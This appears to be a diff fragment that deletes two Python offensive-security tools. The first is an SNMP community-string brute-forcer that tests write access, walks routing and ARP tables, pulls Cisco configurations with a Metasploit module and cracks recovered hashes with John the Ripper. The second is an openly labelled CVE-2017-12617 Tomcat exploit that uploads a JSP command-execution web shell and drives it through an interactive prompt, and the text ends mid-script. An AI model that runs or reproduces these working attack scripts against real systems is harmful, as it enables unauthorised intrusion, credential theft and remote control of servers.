@classmethod
|
||||
def iversion(cls, v):
|
||||
if v in ['v1', '1']:
|
||||
return cls.v1
|
||||
elif v in ['v2', '2', 'v2c']:
|
||||
return cls.v2c
|
||||
elif v in ['v3', '3']:
|
||||
return cls.v3
|
||||
raise ValueError('No such version %s' % v)
|
||||
|
||||
@classmethod
|
||||
def sversion(cls, v):
|
||||
if not v:
|
||||
return 'v1'
|
||||
elif v == 1:
|
||||
return 'v2c'
|
||||
elif v == 2:
|
||||
return 'v3'
|
||||
raise ValueError('No such version number %s' % v)
|
||||
|
||||
class SNMPBruteForcer(object):
|
||||
#This class is used for the sploitego method of bruteforce (--sploitego)
|
||||
'''Credits
|
||||
Class copied from sploitego project
|
||||
__original_author__ = 'Nadeem Douba'
|
||||
https://github.com/allfro/sploitego/blob/master/src/sploitego/scapytools/snmp.py
|
||||
'''
|
||||
def __init__(self, agent, port=161, version='v2c', timeout=0.5, rate=1000):
|
||||
self.version = SNMPVersion.iversion(version)
|
||||
self.s = socket(AF_INET, SOCK_DGRAM)
|
||||
self.s.settimeout(timeout)
|
||||
self.addr = (agent, port)
|
||||
self.rate = rate
|
||||
|
||||
def guess(self, communities):
|
||||
|
||||
p = SNMP(
|
||||
version=self.version,
|
||||
PDU=SNMPget(varbindlist=[SNMPvarbind(oid=ASN1_OID('1.3.6.1.2.1.1.1.0'))])
|
||||
)
|
||||
r = []
|
||||
for c in communities:
|
||||
i = randint(0, 2147483647)
|
||||
p.PDU.id = i
|
||||
p.community = c
|
||||
self.s.sendto(str(p), self.addr)
|
||||
sleep(1/self.rate)
|
||||
while True:
|
||||
try:
|
||||
p = SNMP(self.s.recvfrom(65535)[0])
|
||||
except timeout:
|
||||
break
|
||||
r.append(p.community.val)
|
||||
return r
|
||||
|
||||
def __del__(self):
|
||||
self.s.close()
|
||||
|
||||
class SNMPResults:
|
||||
addr=''
|
||||
version=''
|
||||
community=''
|
||||
write=False
|
||||
|
||||
def __eq__(self, other):
|
||||
return self.addr == other.addr and self.version == other.version and self.community == other.community
|
||||
|
||||
##########################################################################################################
|
||||
# Colour output functions
|
||||
##########################################################################################################
|
||||
|
||||
# for color output
|
||||
BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE = range(8)
|
||||
|
||||
#following from Python cookbook, #475186
|
||||
def has_colours(stream):
|
||||
if not hasattr(stream, "isatty"):
|
||||
return False
|
||||
if not stream.isatty():
|
||||
return False # auto color only on TTYs
|
||||
try:
|
||||
import curses
|
||||
curses.setupterm()
|
||||
return curses.tigetnum("colors") > 2
|
||||
except:
|
||||
# guess false in case of error
|
||||
return False
|
||||
has_colours = has_colours(sys.stdout)
|
||||
|
||||
def printout(text, colour=WHITE):
|
||||
|
||||
if has_colours and defaults.colour:
|
||||
seq = "\x1b[1;%dm" % (30+colour) + text + "\x1b[0m\n"
|
||||
sys.stdout.write(seq)
|
||||
else:
|
||||
#sys.stdout.write(text)
|
||||
print text
|
||||
|
||||
|
||||
##########################################################################################################
|
||||
#
|
||||
##########################################################################################################
|
||||
|
||||
def banner(art=True):
|
||||
if art:
|
||||
print >> sys.stderr, " _____ _ ____ _______ ____ __ "
|
||||
print >> sys.stderr, " / ___// | / / |/ / __ \\ / __ )_______ __/ /____ "
|
||||
print >> sys.stderr, " \\__ \\/ |/ / /|_/ / /_/ / / __ / ___/ / / / __/ _ \\"
|
||||
print >> sys.stderr, " ___/ / /| / / / / ____/ / /_/ / / / /_/ / /_/ __/"
|
||||
print >> sys.stderr, "/____/_/ |_/_/ /_/_/ /_____/_/ \\__,_/\\__/\\___/ "
|
||||
print >> sys.stderr, ""
|
||||
print >> sys.stderr, "SNMP Bruteforce & Enumeration Script " + __version__
|
||||
print >> sys.stderr, "http://www.secforce.com / nikos.vassakis <at> secforce.com"
|
||||
print >> sys.stderr, "###############################################################"
|
||||
print >> sys.stderr, ""
|
||||
|
||||
def listener(sock,results):
|
||||
while True:
|
||||
try:
|
||||
response,addr=SNMPrecv(sock)
|
||||
except timeout:
|
||||
continue
|
||||
except KeyboardInterrupt:
|
||||
break
|
||||
except:
|
||||
break
|
||||
r=SNMPResults()
|
||||
r.addr=addr
|
||||
r.version=SNMPVersion.sversion(response.version.val)
|
||||
r.community=response.community.val
|
||||
results.append(r)
|
||||
printout (('%s : %s \tVersion (%s):\t%s' % (str(addr[0]),str(addr[1]), SNMPVersion.sversion(response.version.val),response.community.val)),WHITE)
|
||||
|
||||
def SNMPrecv(sock):
|
||||
try:
|
||||
recv,addr=sock.recvfrom(65535)
|
||||
response = SNMP(recv)
|
||||
return response,addr
|
||||
except:
|
||||
raise
|
||||
|
||||
def SNMPsend(sock, packets, ip, port=defaults.port, community='', rate=defaults.rate):
|
||||
addr = (ip, port)
|
||||
for packet in packets:
|
||||
i = randint(0, 2147483647)
|
||||
packet.PDU.id = i
|
||||
packet.community = community
|
||||
sock.sendto(str(packet), addr)
|
||||
sleep(1/rate)
|
||||
|
||||
def SNMPRequest(result,OID, value='', TimeOut=defaults.timeOut):
|
||||
s = socket(AF_INET, SOCK_DGRAM)
|
||||
s.settimeout(TimeOut)
|
||||
response=''
|
||||
r=result
|
||||
|
||||
version = SNMPVersion.iversion(r.version)
|
||||
if value:
|
||||
p = SNMP(
|
||||
version=version,
|
||||
PDU=SNMPset(varbindlist=[SNMPvarbind(oid=ASN1_OID(OID), value=value)])
|
||||
)
|
||||
else:
|
||||
p = SNMP(
|
||||
version=version,
|
||||
PDU=SNMPget(varbindlist=[SNMPvarbind(oid=ASN1_OID(OID))])
|
||||
)
|
||||
|
||||
SNMPsend(s,p,r.addr[0],r.addr[1],r.community)
|
||||
for x in range(0, 5):
|
||||
try:
|
||||
response,addr=SNMPrecv(s)
|
||||
break
|
||||
except timeout: # if request times out retry
|
||||
sleep(0.5)
|
||||
continue
|
||||
s.close
|
||||
if not response:
|
||||
raise timeout
|
||||
return response
|
||||
|
||||
def testSNMPWrite(results,options,OID='.1.3.6.1.2.1.1.4.0'):
|
||||
#Alt .1.3.6.1.2.1.1.5.0
|
||||
|
||||
setval='HASH(0xDEADBEF)'
|
||||
for r in results:
|
||||
try:
|
||||
originalval=SNMPRequest(r,OID)
|
||||
|
||||
if originalval:
|
||||
originalval=originalval[SNMPvarbind].value.val
|
||||
|
||||
SNMPRequest(r,OID,setval)
|
||||
curval=SNMPRequest(r,OID)[SNMPvarbind].value.val
|
||||
|
||||
if curval == setval:
|
||||
r.write=True
|
||||
try:
|
||||
SNMPRequest(r,OID,originalval)
|
||||
except timeout:
|
||||
pass
|
||||
if options.verbose: printout (('\t %s (%s) (RW)' % (r.community,r.version)),GREEN)
|
||||
curval=SNMPRequest(r,OID)[SNMPvarbind].value.val
|
||||
if curval != originalval:
|
||||
printout(('Couldn\'t restore value to: %s (OID: %s)' % (str(originalval),str(OID))),RED)
|
||||
else:
|
||||
if options.verbose: printout (('\t %s (%s) (R)' % (r.community,r.version)),BLUE)
|
||||
else:
|
||||
r.write=None
|
||||
printout (('\t %s (%s) (Failed)' % (r.community,r.version)),RED)
|
||||
except timeout:
|
||||
r.write=None
|
||||
printout (('\t %s (%s) (Failed!)' % (r.community,r.version)),RED)
|
||||
continue
|
||||
|
||||
def generic_snmpwalk(snmpwalk_args,oids):
|
||||
for key, val in oids.items():
|
||||
try:
|
||||
printout(('################## Enumerating %s Table using: %s (%s)'%(key,val[0],val[1])),YELLOW)
|
||||
entry={}
|
||||
out=os.popen('snmpwalk'+snmpwalk_args+' '+val[0]+' '+' | cut -d\'=\' -f 2').readlines()
|
||||
|
||||
print '\tINFO'
|
||||
print '\t----\t'
|
||||
for i in out:
|
||||
print '\t',i.strip()
|
||||
print '\n'
|
||||
except KeyboardInterrupt:
|
||||
pass
|
||||
|
||||
def enumerateSNMPWalk(result,options):
|
||||
r=result
|
||||
|
||||
snmpwalk_args=' -c "'+r.community+'" -'+r.version+' '+str(r.addr[0])+':'+str(r.addr[1])
|
||||
|
||||
############################################################### Enumerate OS
|
||||
if options.windows:
|
||||
generic_snmpwalk(snmpwalk_args,WINDOWS_OIDS)
|
||||
return
|
||||
if options.linux:
|
||||
generic_snmpwalk(snmpwalk_args,LINUX_OIDS)
|
||||
return
|
||||
if options.cisco:
|
||||
generic_snmpwalk(snmpwalk_args,CISCO_OIDS)
|
||||
|
||||
############################################################### Enumerate CISCO Specific
|
||||
############################################################### Enumerate Routes
|
||||
entry={}
|
||||
out=os.popen('snmpwalk'+snmpwalk_args+' '+'.1.3.6.1.2.1.4.21.1.1'+' '+'| awk \'{print $NF}\' 2>&1''').readlines()
|
||||
lines = len(out)
|
||||
|
||||
printout('################## Enumerating Routing Table (snmpwalk)',YELLOW)
|
||||
try:
|
||||
for key, val in RouteOIDS.items(): #Enumerate Routes
|
||||
#print '\t *',val[1], val[0]
|
||||
out=os.popen('snmpwalk'+snmpwalk_args+' '+val[0]+' '+'| awk \'{print $NF}\' 2>&1').readlines()
|
||||
|
||||
entry[val[1]]=out
|
||||
|
||||
|
||||
print '\tDestination\t\tNext Hop\tMask\t\t\tMetric\tInterface\tType\tProtocol\tAge'
|
||||
print '\t-----------\t\t--------\t----\t\t\t------\t---------\t----\t--------\t---'
|
||||
for j in range(lines):
|
||||
print( '\t'+entry['Destination'][j].strip().ljust(12,' ') +
|
||||
'\t\t'+entry['Next Hop'][j].strip().ljust(12,' ') +
|
||||
'\t'+entry['Mask'][j].strip().ljust(12,' ') +
|
||||
'\t\t'+entry['Metric'][j].strip().center(6,' ') +
|
||||
'\t'+entry['Interface'][j].strip().center(10,' ') +
|
||||
'\t'+entry['Route type'][j].strip().center(4,' ') +
|
||||
'\t'+entry['Route protocol'][j].strip().center(8,' ') +
|
||||
'\t'+entry['Route age'][j].strip().center(3,' ')
|
||||
)
|
||||
except KeyboardInterrupt:
|
||||
pass
|
||||
|
||||
############################################################### Enumerate Arp
|
||||
print '\n'
|
||||
for key, val in ARPOIDS.items():
|
||||
try:
|
||||
printout(('################## Enumerating ARP Table using: %s (%s)'%(val[0],val[1])),YELLOW)
|
||||
entry={}
|
||||
out=os.popen('snmpwalk'+snmpwalk_args+' '+val[0]+' '+' | cut -d\'=\' -f 2 | cut -d\':\' -f 2').readlines()
|
||||
|
||||
lines=len(out)/3
|
||||
|
||||
entry['V']=out[0*lines:1*lines]
|
||||
entry['MAC']=out[1*lines:2*lines]
|
||||
entry['IP']=out[2*lines:3*lines]
|
||||
|
||||
|
||||
print '\tIP\t\tMAC\t\t\tV'
|
||||
print '\t--\t\t---\t\t\t--'
|
||||
for j in range(lines):
|
||||
print( '\t'+entry['IP'][j].strip().ljust(12,' ') +
|
||||
'\t'+entry['MAC'][j].strip().ljust(18,' ') +
|
||||
'\t'+entry['V'][j].strip().ljust(2,' ')
|
||||
)
|
||||
print '\n'
|
||||
except KeyboardInterrupt:
|
||||
pass
|
||||
|
||||
############################################################### Enumerate SYSTEM
|
||||
for key, val in OIDS.items():
|
||||
try:
|
||||
printout(('################## Enumerating %s Table using: %s (%s)'%(key,val[0],val[1])),YELLOW)
|
||||
entry={}
|
||||
out=os.popen('snmpwalk'+snmpwalk_args+' '+val[0]+' '+' | cut -d\'=\' -f 2').readlines()
|
||||
|
||||
print '\tINFO'
|
||||
print '\t----\t'
|
||||
for i in out:
|
||||
print '\t',i.strip()
|
||||
print '\n'
|
||||
except KeyboardInterrupt:
|
||||
pass
|
||||
############################################################### Enumerate Interfaces
|
||||
for key, val in snmpstat_args.items():
|
||||
try:
|
||||
printout(('################## Enumerating %s Table using: %s (%s)'%(key,val[0],val[1])),YELLOW)
|
||||
out=os.popen('snmpnetstat'+snmpwalk_args+' '+val[0]).readlines()
|
||||
|
||||
for i in out:
|
||||
print '\t',i.strip()
|
||||
print '\n'
|
||||
except KeyboardInterrupt:
|
||||
pass
|
||||
|
||||
def get_cisco_config(result,options):
|
||||
printout(('################## Trying to get config with: %s'% result.community),YELLOW)
|
||||
|
||||
identified_ip=os.popen('ifconfig eth0 |grep "inet addr:" |cut -d ":" -f 2 |awk \'{ print $1 }\'').read()
|
||||
|
||||
if options.interactive:
|
||||
Local_ip = raw_input('Enter Local IP ['+str(identified_ip).strip()+']:') or identified_ip.strip()
|
||||
else:
|
||||
Local_ip = identified_ip.strip()
|
||||
|
||||
if not (os.path.isdir("./output")):
|
||||
os.popen('mkdir output')
|
||||
|
||||
p=Popen('msfcli auxiliary/scanner/snmp/cisco_config_tftp RHOSTS='+str(result.addr[0])+' LHOST='+str(Local_ip)+' COMMUNITY="'+result.community+'" OUTPUTDIR=./output RETRIES=1 RPORT='+str(result.addr[1])+' THREADS=5 VERSION='+result.version.replace('v','')+' E ',shell=True,stdin=PIPE,stdout=PIPE, stderr=PIPE) #>/dev/null 2>&1
|
||||
|
||||
|
||||
print 'msfcli auxiliary/scanner/snmp/cisco_config_tftp RHOSTS='+str(result.addr[0])+' LHOST='+str(Local_ip)+' COMMUNITY="'+result.community+'" OUTPUTDIR=./output RETRIES=1 RPORT='+str(result.addr[1])+' THREADS=5 VERSION='+result.version.replace('v','')+' E '
|
||||
|
||||
out=[]
|
||||
while p.poll() is None:
|
||||
line=p.stdout.readline()
|
||||
out.append(line)
|
||||
print '\t',line.strip()
|
||||
|
||||
printout('################## Passwords Found:',YELLOW)
|
||||
encrypted=[]
|
||||
for i in out:
|
||||
if "Password" in i:
|
||||
print '\t',i.strip()
|
||||
if "Encrypted" in i:
|
||||
encrypted.append(i.split()[-1])
|
||||
|
||||
if encrypted:
|
||||
print '\nCrack encrypted password(s)?'
|
||||
for i in encrypted:
|
||||
print '\t',i
|
||||
|
||||
#if (False if raw_input("(Y/n):").lower() == 'n' else True):
|
||||
if not get_input("(Y/n):",'n',options):
|
||||
|
||||
with open('./hashes', 'a') as f:
|
||||
for i in encrypted:
|
||||
f.write(i+'\n')
|
||||
|
||||
p=Popen('john ./hashes',shell=True,stdin=PIPE,stdout=PIPE,stderr=PIPE)
|
||||
while p.poll() is None:
|
||||
print '\t',p.stdout.readline()
|
||||
print 'Passwords Cracked:'
|
||||
out=os.popen('john ./hashes --show').readlines()
|
||||
for i in out:
|
||||
print '\t', i.strip()
|
||||
|
||||
out=[]
|
||||
while p.poll() is None:
|
||||
line=p.stdout.readline()
|
||||
out.append(line)
|
||||
print '\t',line.strip()
|
||||
|
||||
def select_community(results,options):
|
||||
default=None
|
||||
try:
|
||||
printout("\nIdentified Community strings",WHITE)
|
||||
|
||||
for l,r in enumerate(results):
|
||||
if r.write==True:
|
||||
printout ('\t%s) %s %s (%s)(RW)'%(l,str(r.addr[0]).ljust(15,' '),str(r.community),str(r.version)),GREEN)
|
||||
default=l
|
||||
elif r.write==False:
|
||||
printout ('\t%s) %s %s (%s)(RO)'%(l,str(r.addr[0]).ljust(15,' '),str(r.community),str(r.version)),BLUE)
|
||||
else:
|
||||
printout ('\t%s) %s %s (%s)'%(l,str(r.addr[0]).ljust(15,' '),str(r.community),str(r.version)),RED)
|
||||
|
||||
if default is None:
|
||||
default = l
|
||||
|
||||
if not options.enum:
|
||||
return
|
||||
|
||||
if options.interactive:
|
||||
selection=raw_input("Select Community to Enumerate ["+str(default)+"]:")
|
||||
if not selection:
|
||||
selection=default
|
||||
else:
|
||||
selection=default
|
||||
|
||||
try:
|
||||
return results[int(selection)]
|
||||
except:
|
||||
return results[l]
|
||||
except KeyboardInterrupt:
|
||||
exit(0)
|
||||
|
||||
def SNMPenumeration(result,options):
|
||||
getcisco=defaults.getcisco
|
||||
try:
|
||||
printout (("\nEnumerating with READ-WRITE Community string: %s (%s)" % (result.community,result.version)),YELLOW)
|
||||
enumerateSNMPWalk(result,options)
|
||||
|
||||
if options.windows or options.linux:
|
||||
if not get_input("Get Cisco Config (y/N):",'y',options):
|
||||
getcisco=False
|
||||
if getcisco:
|
||||
get_cisco_config(result,options)
|
||||
except KeyboardInterrupt:
|
||||
print '\n'
|
||||
return
|
||||
|
||||
def password_brutefore(options, communities, ips):
|
||||
s = socket(AF_INET, SOCK_DGRAM)
|
||||
s.settimeout(options.timeOut)
|
||||
|
||||
results=[]
|
||||
|
||||
#Start the listener
|
||||
T = threading.Thread(name='listener', target=listener, args=(s,results,))
|
||||
T.start()
|
||||
|
||||
# Craft SNMP's for both versions
|
||||
p1 = SNMP(
|
||||
version=SNMPVersion.iversion('v1'),
|
||||
PDU=SNMPget(varbindlist=[SNMPvarbind(oid=ASN1_OID('1.3.6.1.2.1.1.1.0'))])
|
||||
)
|
||||
p2c = SNMP(
|
||||
version=SNMPVersion.iversion('v2c'),
|
||||
PDU=SNMPget(varbindlist=[SNMPvarbind(oid=ASN1_OID('1.3.6.1.2.1.1.1.0'))])
|
||||
)
|
||||
|
||||
packets = [p1, p2c]
|
||||
|
||||
#We try each community string
|
||||
for i,community in enumerate(communities):
|
||||
#sys.stdout.write('\r{0}'.format('.' * i))
|
||||
#sys.stdout.flush()
|
||||
for ip in ips:
|
||||
SNMPsend(s, packets, ip, options.port, community.rstrip(), options.rate)
|
||||
|
||||
#We read from STDIN if necessary
|
||||
if options.stdin:
|
||||
while True:
|
||||
try:
|
||||
try:
|
||||
community=raw_input().strip('\n')
|
||||
for ip in ips:
|
||||
SNMPsend(s, packets, ip, options.port, community, options.rate)
|
||||
except EOFError:
|
||||
break
|
||||
except KeyboardInterrupt:
|
||||
break
|
||||
|
||||
try:
|
||||
print "Waiting for late packets (CTRL+C to stop)"
|
||||
sleep(options.timeOut+options.delay) #Waiting in case of late response
|
||||
except KeyboardInterrupt:
|
||||
pass
|
||||
T._Thread__stop()
|
||||
s.close
|
||||
|
||||
#We remove any duplicates. This relies on the __equal__
|
||||
newlist = []
|
||||
for i in results:
|
||||
if i not in newlist:
|
||||
newlist.append(i)
|
||||
return newlist
|
||||
|
||||
def get_input(string,non_default_option,options):
|
||||
#(True if raw_input("Enumerate with different community? (Y/n):").lower() == 'n' else False)
|
||||
|
||||
if options.interactive:
|
||||
if raw_input(string).lower() == non_default_option:
|
||||
return True
|
||||
else:
|
||||
return False
|
||||
else:
|
||||
print string
|
||||
return False
|
||||
|
||||
def main():
|
||||
|
||||
parser = optparse.OptionParser(formatter=optparse.TitledHelpFormatter())
|
||||
|
||||
parser.set_usage("python snmp-brute.py -t <IP> -f <DICTIONARY>")
|
||||
#parser.add_option('-h','--help', help='Show this help message and exit', action=parser.print_help())
|
||||
parser.add_option('-f','--file', help='Dictionary file', dest='dictionary', action='store')
|
||||
parser.add_option('-t','--target', help='Host IP', dest='ip', action='store')
|
||||
parser.add_option('-p','--port', help='SNMP port', dest='port', action='store', type='int',default=defaults.port)
|
||||
|
||||
|
||||
groupAlt = optparse.OptionGroup(parser, "Alternative Options")
|
||||
groupAlt.add_option('-s','--stdin', help='Read communities from stdin', dest='stdin', action='store_true',default=False)
|
||||
groupAlt.add_option('-c','--community', help='Single Community String to use', dest='community', action='store')
|
||||
groupAlt.add_option('--sploitego', help='Sploitego\'s bruteforce method', dest='sploitego', action='store_true',default=False)
|
||||
|
||||
|
||||
groupAuto = optparse.OptionGroup(parser, "Automation")
|
||||
groupAuto.add_option('-b','--bruteonly', help='Do not try to enumerate - only bruteforce', dest='enum', action='store_false',default=True)
|
||||
groupAuto.add_option('-a','--auto', help='Non Interactive Mode', dest='interactive', action='store_false',default=True)
|
||||
groupAuto.add_option('--no-colours', help='No colour output', dest='colour', action='store_false',default=True)
|
||||
|
||||
groupAdvanced = optparse.OptionGroup(parser, "Advanced")
|
||||
groupAdvanced.add_option('-r','--rate', help='Send rate', dest='rate', action='store',type='float', default=defaults.rate)
|
||||
groupAdvanced.add_option('--timeout', help='Wait time for UDP response (in seconds)', dest='timeOut', action='store', type='float' ,default=defaults.timeOut)
|
||||
groupAdvanced.add_option('--delay', help='Wait time after all packets are send (in seconds)', dest='delay', action='store', type='float' ,default=defaults.delay)
|
||||
|
||||
groupAdvanced.add_option('--iplist', help='IP list file', dest='lfile', action='store')
|
||||
groupAdvanced.add_option('-v','--verbose', help='Verbose output', dest='verbose', action='store_true',default=False)
|
||||
|
||||
groupOS = optparse.OptionGroup(parser, "Operating Systems")
|
||||
groupOS.add_option('--windows', help='Enumerate Windows OIDs (snmpenum.pl)', dest='windows', action='store_true',default=False)
|
||||
groupOS.add_option('--linux', help='Enumerate Linux OIDs (snmpenum.pl)', dest='linux', action='store_true',default=False)
|
||||
groupOS.add_option('--cisco', help='Append extra Cisco OIDs (snmpenum.pl)', dest='cisco', action='store_true',default=False)
|
||||
|
||||
parser.add_option_group(groupAdvanced)
|
||||
parser.add_option_group(groupAuto)
|
||||
parser.add_option_group(groupOS)
|
||||
parser.add_option_group(groupAlt)
|
||||
|
||||
(options, arguments) = parser.parse_args()
|
||||
|
||||
communities=[]
|
||||
ips=[]
|
||||
|
||||
banner(options.colour) #For SPARTA!!!
|
||||
|
||||
if not options.ip and not options.lfile:
|
||||
#Can't continue without target
|
||||
parser.print_help()
|
||||
exit(0)
|
||||
else:
|
||||
# Create the list of targets
|
||||
if options.lfile:
|
||||
try:
|
||||
with open(options.lfile) as t:
|
||||
ips = t.read().splitlines() #Potential DoS
|
||||
except:
|
||||
print "Could not open targets file: " + options.lfile
|
||||
exit(0)
|
||||
else:
|
||||
ips.append(options.ip)
|
||||
|
||||
if not options.colour:
|
||||
defaults.colour=False
|
||||
|
||||
# Create the list of communities
|
||||
if options.dictionary: # Read from file
|
||||
with open(options.dictionary) as f:
|
||||
communities=f.read().splitlines() #Potential DoS
|
||||
elif options.community: # Single community
|
||||
communities.append(options.community)
|
||||
elif options.stdin: # Read from input
|
||||
communities=[]
|
||||
else: #if not options.community and not options.dictionary and not options.stdin:
|
||||
communities=default_communities
|
||||
|
||||
#We ensure that default communities are included
|
||||
#if 'public' not in communities:
|
||||
# communities.append('public')
|
||||
#if 'private' not in communities:
|
||||
# communities.append('private')
|
||||
|
||||
if options.stdin:
|
||||
options.interactive=False
|
||||
|
||||
results=[]
|
||||
|
||||
if options.stdin:
|
||||
print >> sys.stderr, "Reading input for community strings ..."
|
||||
else:
|
||||
print >> sys.stderr, "Trying %d community strings ..." % len(communities)
|
||||
|
||||
if options.sploitego: #sploitego method of bruteforce
|
||||
if ips:
|
||||
for ip in ips:
|
||||
for version in ['v1', 'v2c']:
|
||||
bf = SNMPBruteForcer(ip, options.port, version, options.timeOut,options.rate)
|
||||
result=bf.guess(communities)
|
||||
for i in result:
|
||||
r=SNMPResults()
|
||||
r.addr=(ip,options.port)
|
||||
r.version=version
|
||||
r.community=i
|
||||
results.append(r)
|
||||
print ip, version+'\t',result
|
||||
else:
|
||||
parser.print_help()
|
||||
|
||||
else:
|
||||
results = password_brutefore(options, communities, ips)
|
||||
|
||||
#We identify whether the community strings are read or write
|
||||
if results:
|
||||
printout("\nTrying identified strings for READ-WRITE ...",WHITE)
|
||||
testSNMPWrite(results,options)
|
||||
else:
|
||||
printout("\nNo Community strings found",RED)
|
||||
exit(0)
|
||||
|
||||
#We attempt to enumerate the router
|
||||
while options.enum:
|
||||
SNMPenumeration(select_community(results,options),options)
|
||||
|
||||
#if (True if raw_input("Enumerate with different community? (Y/n):").lower() == 'n' else False):
|
||||
if get_input("Enumerate with different community? (y/N):",'y',options):
|
||||
continue
|
||||
else:
|
||||
break
|
||||
|
||||
if not options.enum:
|
||||
select_community(results,options)
|
||||
|
||||
print "Finished!"
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
|
|
@ -1,213 +0,0 @@
|
|||
#!/usr/bin/python
|
||||
import requests
|
||||
import re
|
||||
import signal
|
||||
from optparse import OptionParser
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
class bcolors:
|
||||
HEADER = '\033[95m'
|
||||
OKBLUE = '\033[94m'
|
||||
OKGREEN = '\033[92m'
|
||||
WARNING = '\033[93m'
|
||||
FAIL = '\033[91m'
|
||||
ENDC = '\033[0m'
|
||||
BOLD = '\033[1m'
|
||||
UNDERLINE = '\033[4m'
|
||||
|
||||
|
||||
|
||||
|
||||
banner="""
|
||||
|
||||
|
||||
_______ ________ ___ ___ __ ______ __ ___ __ __ ______
|
||||
/ ____\ \ / / ____| |__ \ / _ \/_ |____ | /_ |__ \ / //_ |____ |
|
||||
| | \ \ / /| |__ ______ ) | | | || | / /_____| | ) / /_ | | / /
|
||||
| | \ \/ / | __|______/ /| | | || | / /______| | / / '_ \| | / /
|
||||
| |____ \ / | |____ / /_| |_| || | / / | |/ /| (_) | | / /
|
||||
\_____| \/ |______| |____|\___/ |_|/_/ |_|____\___/|_|/_/
|
||||
|
||||
|
||||
|
||||
[@intx0x80]
|
||||
|
||||
"""
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
def signal_handler(signal, frame):
|
||||
|
||||
print ("\033[91m"+"\n[-] Exiting"+"\033[0m")
|
||||
|
||||
exit()
|
||||
|
||||
signal.signal(signal.SIGINT, signal_handler)
|
||||
|
||||
|
||||
|
||||
|
||||
def removetags(tags):
|
||||
remove = re.compile('<.*?>')
|
||||
txt = re.sub(remove, '\n', tags)
|
||||
return txt.replace("\n\n\n","\n")
|
||||
|
||||
|
||||
def getContent(url,f):
|
||||
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
|
||||
requests.packages.urllib3.disable_warnings()
|
||||
re=requests.get(str(url)+"/"+str(f), headers=headers,verify=False)
|
||||
return re.content
|
||||
|
||||
def createPayload(url,f):
|
||||
evil='<% out.println("AAAAAAAAAAAAAAAAAAAAAAAAAAAAA");%>'
|
||||
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
|
||||
requests.packages.urllib3.disable_warnings()
|
||||
req=requests.put(str(url)+str(f)+"/",data=evil, headers=headers,verify=False)
|
||||
if req.status_code==201:
|
||||
print "File Created .."
|
||||
|
||||
|
||||
def RCE(url,f):
|
||||
EVIL="""<FORM METHOD=GET ACTION='{}'>""".format(f)+"""
|
||||
<INPUT name='cmd' type=text>
|
||||
<INPUT type=submit value='Run'>
|
||||
</FORM>
|
||||
<%@ page import="java.io.*" %>
|
||||
<%
|
||||
String cmd = request.getParameter("cmd");
|
||||
String output = "";
|
||||
if(cmd != null) {
|
||||
String s = null;
|
||||
try {
|
||||
Process p = Runtime.getRuntime().exec(cmd,null,null);
|
||||
BufferedReader sI = new BufferedReader(new
|
||||
InputStreamReader(p.getInputStream()));
|
||||
while((s = sI.readLine()) != null) { output += s+"</br>"; }
|
||||
} catch(IOException e) { e.printStackTrace(); }
|
||||
}
|
||||
%>
|
||||
<pre><%=output %></pre>"""
|
||||
|
||||
|
||||
|
||||
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
|
||||
requests.packages.urllib3.disable_warnings()
|
||||
req=requests.put(str(url)+f+"/",data=EVIL, headers=headers,verify=False)
|
||||
|
||||
|
||||
|
||||
def shell(url,f):
|
||||
|
||||
while True:
|
||||
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
|
||||
cmd=raw_input("$ ")
|
||||
payload={'cmd':cmd}
|
||||
if cmd=="q" or cmd=="Q":
|
||||
break
|
||||
requests.packages.urllib3.disable_warnings()
|
||||
re=requests.get(str(url)+"/"+str(f),params=payload,headers=headers,verify=False)
|
||||
re=str(re.content)
|
||||
t=removetags(re)
|
||||
print t
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#print bcolors.HEADER+ banner+bcolors.ENDC
|
||||
|
||||
parse=OptionParser(
|
||||
|
||||
|
||||
bcolors.HEADER+"""
|
||||
|
||||
|
||||
_______ ________ ___ ___ __ ______ __ ___ __ __ ______
|
||||
/ ____\ \ / / ____| |__ \ / _ \/_ |____ | /_ |__ \ / //_ |____ |
|
||||
| | \ \ / /| |__ ______ ) | | | || | / /_____| | ) / /_ | | / /
|
||||
| | \ \/ / | __|______/ /| | | || | / /______| | / / '_ \| | / /
|
||||
| |____ \ / | |____ / /_| |_| || | / / | |/ /| (_) | | / /
|
||||
\_____| \/ |______| |____|\___/ |_|/_/ |_|____\___/|_|/_/
|
||||
|
||||
|
||||
|
||||
|
||||
./cve-2017-12617.py [options]
|
||||
|
||||
options:
|
||||
|
||||
-u ,--url [::] check target url if it's vulnerable
|
||||
-p,--pwn [::] generate webshell and upload it
|
||||
-l,--list [::] hosts list
|
||||
|
||||
[+]usage:
|
||||
|
||||
./cve-2017-12617.py -u http://127.0.0.1
|
||||
./cve-2017-12617.py --url http://127.0.0.1
|
||||
./cve-2017-12617.py -u http://127.0.0.1 -p pwn
|
||||
./cve-2017-12617.py --url http://127.0.0.1 -pwn pwn
|
||||
./cve-2017-12617.py -l hotsts.txt
|
||||
./cve-2017-12617.py --list hosts.txt
|
||||
|
||||
|
||||
[@intx0x80]
|
||||
|
||||
"""+bcolors.ENDC
|
||||
|
||||
)
|
||||
|
||||
|
||||
parse.add_option("-u","--url",dest="U",type="string",help="Website Url")
|
||||
parse.add_option("-p","--pwn",dest="P",type="string",help="generate webshell and upload it")
|
||||
parse.add_option("-l","--list",dest="L",type="string",help="hosts File")
|
||||
|
||||
(opt,args)=parse.parse_args()
|
||||
|
||||
if opt.U==None and opt.P==None and opt.L==None:
|
||||
print(parse.usage)
|
||||
exit(0)
|
||||
|
||||
|
||||
|
||||
else:
|
||||
if opt.U!=None and opt.P==None and opt.L==None:
|
||||
